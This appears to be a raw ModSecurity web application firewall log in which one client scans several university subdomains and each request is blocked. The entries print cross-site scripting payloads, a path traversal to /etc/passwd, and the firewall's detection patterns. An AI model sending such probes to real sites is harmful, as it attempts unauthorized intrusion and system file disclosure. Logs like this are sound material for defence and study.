"PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/plugins/servlet/svnwebclient/statsItem.jsp"] [unique_id "ZO15RMCo-f0AAAkr0EkAAAAC"]
[Tue Aug 29 11:51:16.584199 2023] [:error] [pid 2489] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/statsItem.jsp"] [unique_id "ZO15RMCo-f0AAAm5BxUAAAAA"]
[Tue Aug 29 11:51:16.597428 2023] [:error] [pid 2508] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:graph: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15RMCo-f0AAAnMeosAAAAD"]
[Tue Aug 29 11:51:16.600146 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/statsItem.jsp"] [unique_id "ZO15RMCo-f0AAAm7m9MAAAAE"]
[Tue Aug 29 11:51:16.604210 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:graph. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:graph: \\x22zlo onerror=alert(1) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/php/device_graph_page.php"] [unique_id "ZO15RMCo-f0AAAkr0EoAAAAC"]
[Tue Aug 29 11:51:17.557648 2023] [:error] [pid 2508] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:path: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RcCo-f0AAAnMeowAAAAD"]
[Tue Aug 29 11:51:17.599585 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:api_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:api_url: api_url'><script>alert(document.domain)</script> "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php"] [unique_id "ZO15RcCo-f0AAAm7m9QAAAAE"]
[Tue Aug 29 11:51:17.629249 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:path: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RcCo-f0AAAmHd94AAAAz"]
[Tue Aug 29 11:51:17.733508 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:path: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RcCo-f0AAAmLPSMAAAAN"]
[Tue Aug 29 11:51:17.810611 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:path: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RcCo-f0AAAhhc1EAAAAd"]
[Tue Aug 29 11:51:17.816323 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/changedResource.jsp"] [unique_id "ZO15RcCo-f0AAAmHd98AAAAz"]
[Tue Aug 29 11:51:17.823950 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:path: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RcCo-f0AAAm7m9UAAAAE"]
[Tue Aug 29 11:51:17.849414 2023] [:error] [pid 2498] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:api_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:api_url: api_url'><script>alert(document.domain)</script> "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php"] [unique_id "ZO15RcCo-f0AAAnCKzAAAAAK"]
[Tue Aug 29 11:51:17.871663 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:api_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:api_url: api_url'><script>alert(document.domain)</script> "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php"] [unique_id "ZO15RcCo-f0AAAm@5w8AAAAH"]
[Tue Aug 29 11:51:17.875981 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:api_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:api_url: api_url'><script>alert(document.domain)</script> "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php"] [unique_id "ZO15RcCo-f0AAAkyyEcAAAAW"]
[Tue Aug 29 11:51:17.880734 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:api_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:api_url: api_url'><script>alert(document.domain)</script> "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php"] [unique_id "ZO15RcCo-f0AAAm7m9YAAAAE"]
[Tue Aug 29 11:51:18.530917 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:api_url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:api_url: api_url'><script>alert(document.domain)</script> "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php"] [unique_id "ZO15RsCo-f0AAAm-MccAAAAI"]
[Tue Aug 29 11:51:18.541005 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:');alert("XSS. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS_NAMES:');alert(\\x22XSS: ');alert(\\x22XSS"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15RsCo-f0AAAmNp3YAAAAQ"]
[Tue Aug 29 11:51:18.541402 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:path: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15RsCo-f0AAAnDFyIAAAAM"]
[Tue Aug 29 11:51:19.819692 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:url: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/commitGraph.jsp"] [unique_id "ZO15R8Co-f0AAAnIlfoAAAAV"]
[Tue Aug 29 11:51:20.533701 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errormessage. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22>< found within ARGS:errormessage: '\\x22><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/error.jsp"] [unique_id "ZO15SMCo-f0AAAmQ-wkAAAAb"]
[Tue Aug 29 11:51:20.535836 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x22>< found within ARGS:id: </form><iMg src=x onerror=\\x22prompt(document.domain)\\x22><form>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/Forms/rpAuth_1"] [unique_id "ZO15SMCo-f0AAAnHQdYAAAAT"]
[Tue Aug 29 11:51:20.536921 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x22>< found within ARGS:id: </form><iMg src=x onerror=\\x22prompt(document.domain)\\x22><form>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/Forms/rpAuth_1"] [unique_id "ZO15SMCo-f0AAAm7m9sAAAAE"]
[Tue Aug 29 11:51:20.537859 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x22>< found within ARGS:id: </form><iMg src=x onerror=\\x22prompt(document.domain)\\x22><form>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/Forms/rpAuth_1"] [unique_id "ZO15SMCo-f0AAAmHd@QAAAAz"]
[Tue Aug 29 11:51:20.538142 2023] [:error] [pid 2508] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x22>< found within ARGS:id: </form><iMg src=x onerror=\\x22prompt(document.domain)\\x22><form>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/Forms/rpAuth_1"] [unique_id "ZO15SMCo-f0AAAnMepEAAAAD"]
[Tue Aug 29 11:51:20.625387 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:id: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/phpmyadmin/setup/index.php"] [unique_id "ZO15SMCo-f0AAAmHd@UAAAAz"]
[Tue Aug 29 11:51:20.627691 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x22>< found within ARGS:id: </form><iMg src=x onerror=\\x22prompt(document.domain)\\x22><form>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/Forms/rpAuth_1"] [unique_id "ZO15SMCo-f0AAAlIBhgAAAAn"]
[Tue Aug 29 11:51:20.627910 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/plugins/servlet/svnwebclient/statsItem.jsp"] [unique_id "ZO15SMCo-f0AAAm91m0AAAAG"]
[Tue Aug 29 11:51:20.675372 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x22>< found within ARGS:id: </form><iMg src=x onerror=\\x22prompt(document.domain)\\x22><form>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Forms/rpAuth_1"] [unique_id "ZO15SMCo-f0AAAmQ-wsAAAAb"]
[Tue Aug 29 11:51:20.702991 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:id: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/phpmyadmin/setup/index.php"] [unique_id "ZO15SMCo-f0AAAnHQdgAAAAT"]
